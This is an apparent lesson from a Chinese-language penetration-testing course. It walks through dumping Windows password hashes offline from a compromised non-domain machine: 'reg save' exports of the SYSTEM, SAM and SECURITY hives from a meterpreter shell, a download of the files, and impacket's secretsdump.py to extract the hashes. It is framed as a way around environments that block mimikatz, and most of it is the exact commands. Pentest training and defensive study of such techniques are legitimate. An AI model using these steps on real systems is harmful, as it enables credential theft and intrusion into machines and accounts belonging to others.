很多环境下,不允许上传或者使用 mimikatz。而针对非域控的单机离线提取 hash 显得尤为重要。

在 meterpreter shell 命令切到交互式 cmd 命令。
第五十六课:离线提取目标机hash - 图1

reg save 方式使得需要下载的目标机hash文件更小。

  • reg save HKLM\SYSTEM sys.hiv
  • reg save HKLM\SAM sam.hiv
  • reg save hklm\security security.hiv

第五十六课:离线提取目标机hash - 图2

第五十六课:离线提取目标机hash - 图3

meterpreter下自带download功能。

第五十六课:离线提取目标机hash - 图4

第五十六课:离线提取目标机hash - 图5

离线提取:

本季用到的是 impacket 的 secretsdump.py。Kali默认路径:/root/impacket/examples/secretsdump.py

命令如下:

  1. root@John:/tmp# python /root/impacket/examples/secretsdump.py ‐sam sam.hiv ‐security security.hiv ‐system sys.hiv LOCAL

第五十六课:离线提取目标机hash - 图6

Micropoor